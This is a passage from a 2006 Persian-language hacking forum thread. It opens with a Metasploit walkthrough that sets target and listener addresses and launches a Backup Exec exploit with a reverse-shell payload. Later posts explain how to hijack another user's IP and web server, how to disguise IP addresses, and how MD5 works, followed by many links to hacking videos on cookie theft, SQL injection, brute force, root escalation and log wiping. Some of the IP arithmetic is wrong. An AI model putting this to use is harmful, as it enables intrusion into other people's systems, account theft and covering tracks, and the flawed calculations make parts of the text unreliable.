required EXITFUNC process Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
اول قسمت اکسپلویت رو تنظیم میکنیم
هدف شماست و باید ای پی اون رو به متا بدید در متا اسیپلویت RHOST
با این دستور
set RHOST 217.219.226.15

msf backupexec_agent(win32_reverse) > set RHOST 217.216.226.15
RHOST -> 217.216.226.15
msf backupexec_agent(win32_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ -------------- ------------------
required RHOST 217.216.226.15 The target address
required RPORT 10000 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC process Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Veritas BE 9.0/9.1/10.0 (All Windows)
خوب حالا نوبت پیلود هست
-------- -------- ------- ------------------------------------------

required EXITFUNC process Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
همون ای پی خودتون رو باید بدید که سیستم قربانی به شما کانکت بشهLHOST

msf backupexec_agent(win32_reverse) > set LHOST 217.219.226.11
LHOST -> 217.219.226.11
msf backupexec_agent(win32_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ -------------- ------------------
required RHOST 217.216.226.15 The target address
required RPORT 10000 The target port

Payload: Name Default Description
-------- -------- -------------- ------------------------------------
------
required EXITFUNC process Exit technique: "process", "thread",
"seh"
required LHOST 217.219.226.11 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Veritas BE 9.0/9.1/10.0 (All Windows)

خوب الان هم پیلود و هم اکسپلویت ما اماده شده
با دستور
exploit
حمله رو آغاز میکنیم
msf backupexec_agent(win32_reverse) > exploit
Starting Reverse Handler.
Attempting to exploit Veritas BE 9.0/9.1/10.0 (All Windows)
Error creating socket: Connection failed: Operation now in progress
Exiting Reverse Handler.
msf backupexec_agent(win32_reverse) >
اگر سیستم قربانی آسیب پذیر بود به ما شل میداد
نکاتی پیرامون بحث:
1.در متا اسپلویت کامند های شما باید با حروف کوچک تایپ شوند بجز در مواردی مثل
set PAYLOAD (payloadname)
2.این برنامه قابل آپدیت است با
msfupdate
3.متااسپلویت رو از
www.metasploit.com (http://www.metasploit.com/)
lمیتونید داونلود کنید
4.بعضی اکسپلویت ها جای
باشندREALHOSTوHTTPHOSTدارایRHOST
که جای اونها ای پی خودتونو بزنید و یک سرور مجازی برای هک کردن بسازید
در این باره در کلیپ بیشتر توضیح داده شده
5.با استفاده از هلپ در کامند میتونید مشکلات پیش امده را برطرف کنید
اکسپلویت های کنسول رو ببینیدshow exploits6.با دستور
نویسنده:مرمروث
تاریخ:21/7/1385
MorMoroth.Alone Satanic Boy In The Darkness
AllrightReserved For HexHackers Network Security Team

كلیپ مربوط داونلود (http://mormoroth.persiangig.com/video/Meta.rar)

pastoo
23-10-2006, 15:32
دوستان پسورد اولیه که برای بیشتر روتر ها را اینجا میتوانید پیدا کنید




http://www.routerpasswords.com/index.asp

pastoo
23-10-2006, 23:24
تغيير IP و حفظ خود از حملات DoS و DDoS (Changing IP and Protecting from DoS and DDoS attacks):
سلام به همه، براي تغيير IP روش ها و نرم افزارها مختلفي وجود دارد ولي من مي خوام يكي از آسون ترين روش ها رو بگم:

A: اطلاعات مورد نياز (Needed Information)
1. قبل از هر چيز بايد يك مختصر توضيح در مورد Range IP بدونيد. هر ISP داراي يك Range IP مي باشد (بنابرنوع ISP تعداد IP مي تواند بيشتر هم باشه - برميگرده به بحث همون كلاسهاي IP). هر موقع كه شما به اينترنت Connect ميشويد ISP شما به طور تصادفي يك IP به PC شما مي دهد (اين مطلب در مورد Dial-Up Users صدق مي كنه). مثل اين IP:
213.217.219.169
البته بايد بدانيد كه در هر Range IP فقط رقم آخر (8 بيت آخر) IP تغيير مي كنه. مثلا اگر PC ديگري بخواهد به اينترنت با همان ISP وصل شود، IP آن كامپيوتر بين دو IP زير خواهد بود:
213.217.219.1 < 213.217.219.xxx < 213.217.219.255

2. Subnet Mask، Default Gateway و DHCP Server (اينها رو در مقاله مفصلي كه درباره ي TCP/IP بود توضيح دادم ولي باز هم مي گم):
خوب براي پيدا كردن IP هاي Subnet Mask و Gate Way و DNS Server يك راه خيلي ساده هست. در Command Prompt تايپ كنيد:
ipconfig/all

كه تمام اطلاعات مورد نياز رو به شما ميده. لطفا اين اطلاعات را جاي يادداشت كنيد (يا Print Screen بگيريد)، چون بعدا از اينها استفاده ميشه. مثلا:

Host Name . . . . . . . . . . . . : My Computer Name Here
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS ***** Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xxxx.xx.x
Description . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . : 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . : Monday, January 20, 2003 408 PM
Lease Expires . . . . . . . . . . : Tuesday, January 21, 2003 316 AM

B: IP هاي مرده (Dead IP):
Dead آن دسته از IP هايي هستند كه به PC خاصي تعلق ندارند و بدون كاربر هستند. شما مي توانيد IP خودتون را به هر Dead IP ديگر تغيير بدهيد. براي اينكه از Dead بودن يك IP مطمئن باشيد در Command Prompt عبارت زير را تايپ كنيد:
ping -n 10
پس از تايپ و فشردن كليد Enter، اگر در جواب "Time Out" ديديد، يعني اينكه IP مورد هر 10 تبادل ping "Time Out" باشه.

تذكر: دوستاني كه Dial-Up به اينترنت وصل مي شوند بايد بدونيد كه در بعضي مواقع به دلايل مختلف مثل: پائين بودن سرعت، بسته بودن پورت هاي مربوط بهICMP ، داشتن firewall و ... از ping كردن يك IP، "Time Out" مي گيريد كه دليل بر dead بودن آن IP نيست.

C: Change your IP:
براي اين كار نياز به هيچ نرم افزاري نداريد. اين كار با خود ويندوز عملي هست. به آدرس زير برويد:
My Computer > Control Panel > Network Connection
خوب حالا Connection مورد نظر خودتون رو انتخاب كنيد. روي آن Right-Click كنيد و قسمت "Properties" را انتخاب كنيد. حالا برگه (tab)، "Networking" را انتخاب كنيد و روي پروتكل "Internet protocol (TCP/IP)" دوبار كليك كنيد و برگه "General" را انتخاب كنيد. حال قسمت "Use the following IP Address" را فعال كنيد. در IP Address، يك Dead IP بنويسيد. مثل:
0.0.0.1-254
يا يك چيزي شبيه به آن.
حال در قسمت "Use the Following DNS sever" دو IP مربوط به DNS كه به دست آورديد رو وارد كنيد. اين براي ويندوز XP بود. اگه از ويندوز 2000 يا ويندوزهاي ديگر استفاده مي كنيد، بايد IP هاي مربوط به Gateway و Subnet Mask رو هم وارد كنيد كه از "ipconfig/all" به دست آورديد.

سوال: حالا براي خودم اين سوال پيش اومده و اون اينكه اگر من IP خودمو به يك Dead IP كه از Range IP خودم هست تغيير بدم و بعد 1 يا 2 ساعت يا هر چند ساعت، ISP به يك PC ديگر آن IP را بدهد، اون وقت چي ميشه؟
مثلا IP خودم، 213.213.213.213 هست و dead ip هم باشه 213.213.213.212. حالا اگر ISP اين IP رو به يك PC ديگر بده من DC ميشم يا هيچ اتفاقي نمي افته؟

D: IP Steal from WebServer:
دوستان از همين روش مي شود IP دزدي هم كرد. اگه شما كسي رو روي Range IP خودتون مي شناسيد كه يك Web Server باز كرده و قبلا اعصابتون رو خورد كرده يا شما فقط مي خواهيد يه مقدار شلوغ بازي دربياريد، ميتوانيد IP اون رو بدزديد.
به اين ترتيب هر DNS كه به اون IP بره به جاي سايت اون، سايت شما رو نشون ميده. چون شما خودتون يه Web Server باز خواهيد كرد!!
دزديدن يك IP اساسا استفاده از همون روش تغيير آدرس IP بالا و انتخاب يك IP هست كه يكي كه يه Web Server باز كرده، داره استفاده مي كنه. اغلب شما مي توانيد آن IP رو حداقل براي مدتي نگه داريد، در بقيه موارد شما نمي توانيد از آن استفاده كنيد. بنابراين به تلاش خودتون ادامه بديد تا كار كنه. شما نياز داريد خودتون يك Web Server روي پورت مشابه اون داشته باشيد. شما مي توانيد اين كار رو با سرويس هاي ديگر هم انجام بديد. همچنين شما مي توانيد اون IP كه تلاش مي كنيد بدزدين DoS يا DDoS كنيد تا از شبكه شوتش كنيد بيرون! ولي من اين كار رو توصيه نمي كنم، چون تقريبا غير قانونيه!

روش هايي براي تغيير IP:
با اين روش ها مي توانيد ظاهر IP خودتون را به اعداد ديگر يا اعداد همراه حروف لاتين تغيير بديد (!!!)

برنامه مورد نياز:
Calculator:
Start > Programs > Accessories > Calculator

A: Oct IP (Octet IP- IP هشتايي):
Example: 0330.0163.0154.0365
IP استفاده شده در اين مثال مربوط به سايت yahoo.com است (66.218.71.90)
برنامه ماشين حساب را اجرا كرده و از منوي View، قسمت Scientific را انتخاب كنيد. Dec را انتخاب و قسمت اول IP (66) را وارد كنيد. سپس روي Oct كليك كنيد. مي بينيد كه عدد 66 به 102 تغيير يافت. براي بقيه قسمت هاي IP نيز اين كار رو بكنيد:
66 =102
218 =332
71 =107
90 =132
حال اگر در Browser خودهر يك از لينك هاي زير را وارد كنيد، وارد سايت ياهو مي شويد:
http://www.yahoo.com/
http://66.218.71.90/
http://0102.0332.0107.0132/
http://000102.000332.000107.000132/
روش ديگر: IP در اصل يك عدد 4 رقمي در مبناي 256 هست كه ارقامش رو با نقطه از هم جدا كرده ايم. مثل زير:
A.B.C.D

حال اگر اين عدد كه در مبناي 256 هست رو به مبناي 10 ببريم باز هم كار IP رو مي كنه. يعني مي توانيد از يك عدد ساده هفت يا هشت رقمي به جاي IP استفاده كنيد. اگر كسي خواست اين كلك را به شما بزنه، چه كار مي كنيد؟ خوب ساده است! عدد رو از مبناي 10 به مبناي 256 ببرين تا IP به دست بياد. مثلا اين IP به مبناي 10 تبديل شده:
IP : 213.217.29.54
Base10 : 3587775798
براي تبديل IP به مبناي 10 و تبديل مبناي 10 به IP دو برنامه وجود داره كه اگر خواستيد لينك مي دم (ولي با ماشين حساب هم ميشه ديگه گير نديد زياد).

B: Dec IP:
برنامه ماشين حساب را اجرا كرده و آن را در حالت علمي قرار دهيد. حال قسمت Dec را انتخاب كرده و قسمت اوليه IP (66) را وارد كنيد. سپس اعداد فوق را در 16777216 ضرب كنيد. جواب به صورت 1107296256 مي شود.
اين اعداد را يادداشت كنيد براي بقيه قسمت ها هم به صورت فوق عملكنيد.

(First Part) 66 * 16777216 = 1107296256
(Sec Part) 218 * 65536 = 65754
(Third Part) 71 * 256 = 18176
(Fourth Part) 90 * 1 = 90


حال اين اعداد را با هم جمع كنيد:
1107296256 + 65754 + 18176 + 90 = 1107380276
عدد حاصله IP در مبناي Decimal هست. حال اگر شما روي هر يك از لينك هاي زير كليك كنيد. وارد سايت ياهو مي شويد:
http://www.yahoo.com/
http://66.218.71.90/
http://1107380276/

C: Hex IP:

Example: http://0x42.0xda.0x47.0x5a/ or http://0x42da475a/

اين مدل از IP خيلي جالب هست. برنامه ماشين حساب را اجرا كرده و آنرا در حالت علمي قرار دهيد. Dec را انتخاب و قسمت اوليه IP (66) را وارد كنيد سپس روي Hex كليك كنيد (عدد به 42 تبديل مي شود). براي بقيه قسمت هاي IP نيز روش فوق را انجام دهيد:
66 = 42
218 = DA
71 = 47
90 = 5A

عدد حاصله را به ترتيب زير مرتب كنيد:
42DA475A

حال اين عدد به دو صورت قابل استفاده است. اگر روي هر يك از لينك هاي زير كليك كنيد وارد سايت yahoo مي شويد:

http://www.yahoo.com/
http://66.218.71.90/
http://0x42.0xda.0x47.0x5a/
http://0x42da475a/

D: Bin IP:
Example: http://1000010110110100100011101011010/
اين صورت IP در بيشتر سيستم ها و Browser ها كار نمي كند!
برنامه ماشين حساب را اجرا كرده و آن را در محيط علمي تنظيم كنيد. Dec را انتخاب كرده و IP خود را به Hex IP (دربالا گفته شد) تبديل كنيد.
Hexed IP: 42DA475A
سپس روي C بزنيد و Hex را انتخاب كنيد و عدد Hex شده را وارد كنيد. حال روي Bin بزنيد عدد به صورت زير نمايان مي شود:

Binary IP: 1000010110110100100011101011010

اگر Browser و ISP شما اين نوع IP را Support كند، با كليك بر روي لينك زير وارد سايت ياهو مي شويد:

http://1000010110110100100011101011010/
اميدوارم مورد استفاده قرار بگيره

pastoo
23-10-2006, 23:27
يه مقاله جالب ديگه ...

حملات one way hacking رو توضيح داده و خيلي حالبه .....

TNX Ehssan

Download (http://gholonbeh2.persiangig.com/owwhack.rar)

pastoo
23-10-2006, 23:55
مقاله ایی که اینجا میدم مقاله ایی فوق حرفه ایی برای برنامه نویسان است که که برنامه امنیتی MD5 و هش های آن توضیح داده میشود ....

مترجم: امید متقی راد – omid@oxygenws.com – http://www.oxygenws.com (http://www.oxygenws.com/)

فهرست:
1- خلاصه
2- شرایط و نکات لازم
3- توضیحات الگوریتم MD5
4- نتیجه
5- پا نویس






1- خلاصه:
در این مقاله با الگوریتم "خلاصه پیام MD5" آشنا می شویم. این الگوریتم یک رشته با طول متفاوت را به عنوان ورودی می گیرد و یک "خلاصه پیام MD5" یا "اثر انگشت" با طول 128 بیت می سازد.
در این روش اینکه دو پیام مختلف دارای یک "خلاصه پیام" باشند یا اینکه یک رشته از روی یک "خلاصه پیام" ساخته شود غیر ممکن می باشد. این الگوریتم برای امضاهای دیجیتال مناسب است، جایی که احتیاج به خلاصه کردن یک فایل بزرگ در یک رشتهء امن و فشرده، قبل از کد کردن آن متن، در سیستم های کدینگ، با کلید های خصوصی و عمومی آن سیستم مانند RSA (Rivest Shamir Adelman)
الگوریتم MD5 برای داشتن سرعت بالا در ماشین های 32 بیتی طراحی شده است در عین حال احتیاجی به جانشینی ها در جداول بزرگ ندارد. این الگوریتم را با کدهای بسیار کمی می توان نوشت.
الگوریتم MD5 توسعه ای از الگوریتم MD4 می باشد با این تفاوت که MD5 کمی کندتر از MD4 عمل می کند اما در طراحی آن بسیار محافظه کارانه عمل شده است.
MD5 به این دلیل طراحی شد که حس کردند MD4 به عنوان سرعت بالایی که داشت پذیرفته شده و از امنیت بالایی در شرایط بحرانی برخوردار نمی باشد. MD4 برای سرعت بالا طراحی شده ولی احتمال شکست آن در رمز کردنی موفق وجود دارد. MD5 کمی در سرعت کند شده با این تفاوت که بیشترین امنیت را داراست. این الگوریتم حاصل تاثیر دادن نظرات تعدادی از استفاده کنندگان MD4 به همراه مقادیری تغییر در ساختار الگوریتم برای افزایش سرعت و قدرت آن می باشد. الگوریتم MD5 در این مکان عومی قرارگرفته تا از آن استفاده و در صورت امکان استاندارد شود.

2- شرایط و نکات لازم:
در این متن منظور از « کلمه» تعداد 32 بیت و «بایت» تعداد 8 بیت داده می باشد. یک صف از بیت ها دارای خصوصیات طبیعی یک صف از بایتها می باشند که هر گروه هشت تایی متوالی از بیتها یک بایت را تشکیل می دهند که پرارزش ترین بیت در ابتدا قرار دارد. یک صف از بایت ها دقیقا مشابه یک صف 32 بیتی از کلمات پردازش می شود. جایی که گروهی 4 تایی از توالی بایتها پردازش می شوند، کم ارزش ترین بایت اولین بایت می باشد.
اجازه بدهید از x_i بجای xi (x اندیس i ) استفاده کنیم و اگر مقدار اندیس یک عبارت محاسباتی بود آن را در {} محدود می کنیم، مانند: x_{i-1} . همچنین از ^ به عنوان علامت توان استفاده می کنیم، پس x^i یعنیx به توان i .
اجازه بدهید از علامت «+» برای اضافه کردن دو کلمه به هم استفاده کنیم. از x<<<5 به عنوان عملگر چرخش بیتی در کلمات استفاده می شود کهx به اندازه 5 بیت به چپ چرخش می کند.
از not (x) به عنوان عملگر نقیض بیتی، از X v Y به عنوان عملگر فصل (or) و از X xor Y به عنوان عملگر exclusive or و از XY به عنوان عملگر عطف (and) استفاده می کنیم.

3- توضیحات الگوریتم MD5:
فرض کنید ما b بیت پیام به عنوان ورودی داریم و تصمیم داریم خلاصه پیام آن را بدست آوریم. b در اینجا یک عدد نا منفی و صحیح است، b می تواند مقدار صفر داشته باشد و هیچ محدودیتی برای مضرب هشت بودن آن نیست و به هر اندازه می تواند بزرگ باشد. فرض کنید بیت های این پیام را بشود به صورت زیر نوشت:
m_0 m_1 ... m_{b-1}
برای آوردن خلاصه پیام 5 مرحله زیر را انجام می دهیم:

گام 1- اضافه کردن بیتهای نرم کننده:
طول پیام مورد نظر به 448 به پیمانه 512 توسعه پیدا می کند به این معنی که اگر به طول پیام 64 بیت اضافه شود، طولش مضربی از 512 خواهد بود. عمل توسعه دادن همیشه اجرا می شود مگر اینکه طول پیام به صورت 448 به پیمانه 512 باشد.
عمل توسعه پیام یا نرم کردن آن به صورت زیر انجام می شود:
یک بیت [1] سپس تعدادی بیت [0] به پیام اضافه می شود.اضافه شدن بیت های 0 تا زمانی که طول رشته به 448 بر پایه 512 برسد، ادامه پیدا می کند. در این عمل حداقل یک بیت و حداکثر 512 بیت اضافه خواهد شد.

گام 2- افزایش طول:
یک نمایش 64 بیتی از b بیت پیام اولیه به آخر نتیجه گام قبل اضافه می شود. در بدترین حالت، b بزرگتر از 64 بیت خواهد بود. در این حالت فقط 64 بیت کم ارزش b استفاده خواهد شد.
هم اکنون طول پیام بدست آمده دقیقا معادل مضربی از 512 خواهد بود. مشابه اینکه بگوییم، این پیام طولی معادل مضربی از16 کلمه دارد اجازه بدهید M[0…N-1] را نمایانگر کلمات پیام بدست آمده بدانیم. (N مضربی از 16 می باشد.)

گام 3- یین بافر برای MD:
برای محاسبه خلاصه پیام یک بافر 4 کلمه ای (A,B,C,D) استفاده می شود. هر کدام از A، B، Cو D یک ثبات 32 بیتی می باشند. این ثبات ها مطابق جدول زیر مقدار دهی می شوند ( بایتهای کم ارزش در ابتدا قرار دارند )
word A: 01 23 45 67
word B: 89 ab cd ef
word C: fe dc ba 98
word D: 76 54 32 10

گام 4- پردازش پیام در بلاک های 16 کلمه ای:
در ابتدا 4 تابع کمکی تعریف می کنیم که هر کدام به عنوان ورودی سه کلمهء 32 بیتی می گیرد و برای خروجی یک کلمهء 32 بیتی تولید می کند.
F(X,Y,Z) = XY v not(X) Z
G(X,Y,Z) = XZ v Y not(Z)
H(X,Y,Z) = X xor Y xor Z
I(X,Y,Z) = Y xor (X v not(Z))
در هر موقعیت بیتی، F به عنوان شرط عمل می کند: اگر X آنگاه Y در غیر این صورت Z. تابع F می توانست طوری تعریف شود که به جای استفاده از v از + استفاده کند چون XY و not(X) هرگز یک هایی در موقعیت بیتی یکسان نخواهد داشت. جالب است به یاد داشته باشید که اگر بیت های X، Y و Z مستقل و غیر مرتبط باشند، هر بیت از F(X, Y, Z) مستقل و غیر مرتبط خواهد بود.
توابع G، H و I شبیه تابع F هستند، به طوری که آنها در "توازی بیتی" کار می کنند تا خروجی شان را از بیت های X، Y و Z تولید کنند. در چنین روشی اگر بیت های متناظر X، Y و Z مستقل و غیر مرتبط باشند، آنگاه هر بیت از G(X, Y, Z)، H(X, Y, Z) و I(X, Y, Z) مستقل و غیر مرتبط خواهند بود.
توجه داشته باشید که تابع H، تابع XOR یا توازن بیتی از ورودی هایش است. این گام از یک جدول 64 عنصری T[1…64] ساخته شده از یک تابع مثلثاتی، استفاده می کند. اجازه دهید T[i]، I-امین عنصر جدول را مشخص می کند که برابر است با قسمت صحیح حاصلضرب 4294967296 در abs(sin(i))، به طوری که I به رادیان باشد.
کارهای زیر را انجام می دهید:

/* Process each 16-word block. */
For i = 0 to N/16-1 do

/* Copy block i into X. */
For j = 0 to 15 do
Set X[j] to M[i*16+j].
end /* of loop on j */

/* Save A as AA, B as BB, C as CC, and D as DD. */
AA = A
BB = B
CC = C
DD = D

/* Round 1. */
/* Let [abcd k s i] denote the operation
a = b + ((a + F(b,c,d) + X[k] + T[i]) <<< s). */
/* Do the following 16 operations. */
[ABCD 0 7 1] [DABC 1 12 2] [CDAB 2 17 3] [BCDA 3 22 4]
[ABCD 4 7 5] [DABC 5 12 6] [CDAB 6 17 7] [BCDA 7 22 8]
[ABCD 8 7 9] [DABC 9 12 10] [CDAB 10 17 11] [BCDA 11 22 12]
[ABCD 12 7 13] [DABC 13 12 14] [CDAB 14 17 15] [BCDA 15 22 16]

/* Round 2. */
/* Let [abcd k s i] denote the operation
a = b + ((a + G(b,c,d) + X[k] + T[i]) <<< s). */
/* Do the following 16 operations. */
[ABCD 1 5 17] [DABC 6 9 18] [CDAB 11 14 19] [BCDA 0 20 20]
[ABCD 5 5 21] [DABC 10 9 22] [CDAB 15 14 23] [BCDA 4 20 24]
[ABCD 9 5 25] [DABC 14 9 26] [CDAB 3 14 27] [BCDA 8 20 28]
[ABCD 13 5 29] [DABC 2 9 30] [CDAB 7 14 31] [BCDA 12 20 32]

/* Round 3. */
/* Let [abcd k s t] denote the operation
a = b + ((a + H(b,c,d) + X[k] + T[i]) <<< s). */
/* Do the following 16 operations. */
[ABCD 5 4 33] [DABC 8 11 34] [CDAB 11 16 35] [BCDA 14 23 36]
[ABCD 1 4 37] [DABC 4 11 38] [CDAB 7 16 39] [BCDA 10 23 40]
[ABCD 13 4 41] [DABC 0 11 42] [CDAB 3 16 43] [BCDA 6 23 44]
[ABCD 9 4 45] [DABC 12 11 46] [CDAB 15 16 47] [BCDA 2 23 48]

/* Round 4. */
/* Let [abcd k s t] denote the operation
a = b + ((a + I(b,c,d) + X[k] + T[i]) <<< s). */
/* Do the following 16 operations. */
[ABCD 0 6 49] [DABC 7 10 50] [CDAB 14 15 51] [BCDA 5 21 52]
[ABCD 12 6 53] [DABC 3 10 54] [CDAB 10 15 55] [BCDA 1 21 56]
[ABCD 8 6 57] [DABC 15 10 58] [CDAB 6 15 59] [BCDA 13 21 60]
[ABCD 4 6 61] [DABC 11 10 62] [CDAB 2 15 63] [BCDA 9 21 64]

/* Then perform the following additions. (That is increment each
of the four registers by the value it had before this block
was started.) */
A = A + AA
B = B + BB
C = C + CC
D = D + DD

end /* of loop on i */

گام 5- خروجی:
خلاصه پیامی که به عنوان خروجی تولید می شود و عبارت است از A، B، C و D، که ما با کم ارزش ترین بیت A شروع می کنیم و به با ارزش ترین بیت D خاتمه می دهیم. این تعریف MD5 را کامل می کند.

4- نتیجه:
الگوریتم خلاصه پیام MD5 به سادگی قابل اجرا می باشد و یک "اثر انگشت" یا "خلاصه پیام" از پیام با طول اختیاری تولید می کند. گمان برده می شود که امکان مواجه شدن با دو پیام که خلاصه پیام مشابهی دارند از رتبهء 64^2 و برای هر پیامی که به آن یک خلاصه پیام داده شده است از رتبهء 128^2 می باشد.
الگوریتم MD5 برای نقاط ضعف به دقت بررسی شده است. به هر حال این الگوریتم نسبتا جدید است و تحلیل امنیتی بیشتری را طلب می کند، مشابه طرح های مشابه در این رده.

5- پانویس:
این مقاله اطلاعاتی برای جامعهء اینترنتی مهیا کرده و البته هیچ استانداردی را مشخص نمی کند. انتشار این مقاله به هر تعداد آزاد می باشد.
از آقایان Don Coppersmith, Burt Kaliski, Ralph Merkle, David Chaum, and Noam Nisan برای توضیحات و پیشنهاداتشان متشکریم.

pastoo
24-10-2006, 00:02
در اين کليپ نحوه کامپايل کردن اکسپلويت های نوشته شده به زبان سی تحت windows آموزش داده
شده(برای افراد مبتدی)

DOwnLoad (http://rapidshare.de/files/30271631/Make_Exploits.c_-_In_platform-Windows--BY_deadfuneral.rar.html)


آموزش هايجک کردن email های random يا مشخص
زمان: 9 دقيقه
DownLoad Video (http://www.plunder.com/hijacking-emails-rar-download-13534.htm)


فیلم هک کردن PhotoPos

دانلود (http://alipc1.persiangig.com/video/PhotoPost.rar)

copyright : hackerz.ir

pastoo
24-10-2006, 00:25
تصمیم گرفتم در چند پست متوالی آموزش کاملی از فیلم های آموزشی هک براتون بزارم که دیگه تعداد پست ها را زیاد نکنم پس از این پست لذت ببرید .


در اين کليپ نحوه کامپايل کردن اکسپلويت های نوشته شده به زبان سی تحت windows آموزش داده
شده(برای افراد مبتدی)

DOwnLoad (http://rapidshare.de/files/30271631/Make_Exploits.c_-_In_platform-Windows--BY_deadfuneral.rar.html)


آموزش هايجک کردن email های random يا مشخص
زمان: 9 دقيقه
DownLoad Video (http://www.plunder.com/hijacking-emails-rar-download-13534.htm)


فیلم هک کردن PhotoPos

دانلود (http://alipc1.persiangig.com/video/PhotoPost.rar)

copyright : hackerz.ir


اين کليپ شامل آموزش نحوه دزدين کوکی ها از يک فروم با يک فايل gif + چگونگی جايگزين
کردن کوکی ها برای لاگين کردن با امتياز ادمين ميباشد
(تست شد بر روی IPB 2.1.7 )

http://ad4me.co.il/t3rr0r1st/Video_4...Truths.NeT.rar



Telnet Bruteforce

دانلود (http://irongeek.com/othervids/Telnet%20Bruteforce.zip)

سلام دوستان این هم یکی دیگه از فیلم های سایت Irongeek .
این آخرین فیلمیه که من از این سایت می زام این جا آخه به نظر من زیاد مفهومی نیست ! و فقط به درد حرفه ای ها می خوره !
خوب هکر تو این فیلم نحوه بو کشیدن (sniffing) ورود و خروج کاربران یک سایت رو نشون می ده !
ببینید ! راستی از چند تا از دوستان هکر گرامی اگه لطف کنن سطح این فیلم ها رو عرض یابی کنند !
ممنون.
منبع : ایران هکرز

دانلود (http://irongeek.com/othervids/Sniffing%20logins%20and%20passwords.zip)

Download Codec (http://download.divxmovies.com/XviD-1.1.0-30122005.exe)

گرفتن cmd در شل های ویندوزی
http://www.mormoroth.persiangig.com/video/wincmd.rar

سلام ویدئو هکینگ سایت های که از SQuery استفاده می کنند .http://www.aria-security.net/Forums/images/smileys/44.gif (مبتدی)

دانلود (http://root3r-h3ll.persiangig.com/Video/Cilp0024.rar)


GooGLe Hacking By Mormoroth
http://mormoroth.persiangig.com/video/Koongoshadi.rar

اين يه فيلم آموزش با اكسپلويت
دانلود (http://hitmaniran.persiangig.com/ToBo.rar)



پاک کردن رد پای خود در سرور
دانلود (http://soltan666.persiangig.com/move/clear%20log.rar)


سلام دوستان اين آموزش هكينگ سايت هاي News فكر كنم قديمي باشه http://www.aria-security.net/Forums/images/smileys/33.gif

دانلود (http://satanichell.persiangig.com/video/Site%20news.rar)


phpwcms Hacking
دانلود (http://barzan.persiangig.com/Video.rar)


mail2forum HACKING

Clip:
http://www.nader1781.persiangig.com/...mail2forum.rar (http://www.nader1781.persiangig.com/video/mail2forum.rar)

Exploit:
http://www.milw0rm.com/exploits/2019


How to change File Include Vulnerability to Command Execution
Download (http://www.sadeghi-sc.com/sh3ll/tutorial/Films/INclude.rar)

mySQL root
Download (http://www.sadeghi-sc.com/sh3ll/tutorial/Films/MYSQLROOT.rar)

Local root
Download (http://www.sadeghi-sc.com/sh3ll/tutorial/Films/root.rar)


FTP Root After Remote File Inclusion Video
لینک دریافت = http://www.megaupload.com/?d=GTX01U13
فقط حجمش بالاست ( 54 mb



این فیلم نحوه کرک کردن یوزر و پسورد ادمین ویندوز XP رو نشون میده
http://www.hemenpaylas.com/download/...edit_.rar.html (http://www.hemenpaylas.com/download/433662/admin_pass_edit_.rar.html)

d2kBlog 1.0.3 (memName) Remote SQL Injection
http://rapidshare.de/files/19757276/tr.rar.html

آموزش هک کردن گالری 4Image که توی ایران هم خیلی استفاده میشه و اکسپلویتش هم توی milw0rm هست ....
http://www.hemenpaylas.com/download/...aDaYi.rar.html (http://www.hemenpaylas.com/download/819163/4Images_1.7.1_KaBaDaYi.rar.html)

آموزش هک کردن OsCommerce 2.2
http://www.hemenpaylas.com/download/...aDaYi.rar.html

pastoo
24-10-2006, 00:51
خوب با نام او در این مقاله 3 قسمتی شما با برنامه نویسی پرل آشنا میشوید و میتونید

اکسپلویت های مورد نیاز خود را البته اکسپلویت های مبتنی بر Wep App ها رو بنویسید

کلا بنده شخصا در مقابل C اصلا پرل رو قبول ندارم اما خداییش برای آدم های راحت طلب

چیز فوق العاده ای است و فوق العاده ساده .....

و نکته ی بعدی اینکه Web based هم هر کی از راه میرسه بلده .....

برای نوشتن اکسپلویت های buffer Over Flow با پرل هم بعد از آشنایی با این زبان

یه مقاله مینویسم (کاریست بسی ساده) (البته اگه BOF رو بلد باشید )

این سری مقالات هم تقدیم بر همه ی کسانی که فکر میکنند هر کس یک اکسپلویت برای

یک باگ مبتنی بر وب بنویسد دیگر آخر راه است ...

قیمت اول از مقالات :

http://vampires.persiangig.com/Perl.pdf (http://vampires.persiangig.com/Perl.pdf)

Learning Perl - Writing Exploits
http://www.milw0rm.com/papers/85 (http://www.milw0rm.com/papers/85)

pastoo
24-10-2006, 00:53
این مقاله هم بنا به دلیل درخواست چند تا از دوستانم که در مورد اکسپلویت کردن عملیات

محافظی Kernel لینوکس تحت عنوان Randomiz Stack که باعث سخت شدن نوشتن Exploit

های سرریز بافر میشود ....

موفق باشید .....

http://vampires.persiangig.com/LVAE.pdf (http://vampires.persiangig.com/LVAE.pdf)

Linux Virtual Addresses Exploitation
http://www.milw0rm.com/papers/70 (http://www.milw0rm.com/papers/70)

pastoo
24-10-2006, 01:00
دوستان این تایپیک مرجع خیلی کاملی شده که مطالب رو در 1 جا جمع کردم و در اختیارتون قرار دادم امیدوارم مدیران سایتها و ادمین های عزیز توجه کافی به مساله امنیت داشته باشن بنده با کمال میل در خدمت سوالات شما عزیزان هستم .

منتظر مقالات و آموزش های جدید باشید

در ضمن به مدیران جدید بخش کامپیوتر خوش آمد میگویم و امیدوارم دوستان را از مطالبشان بهره مند کنند
موفق باشید ................................ Pasha Asadpour

pastoo
24-10-2006, 16:38
dotWidget HACKING

Clip:
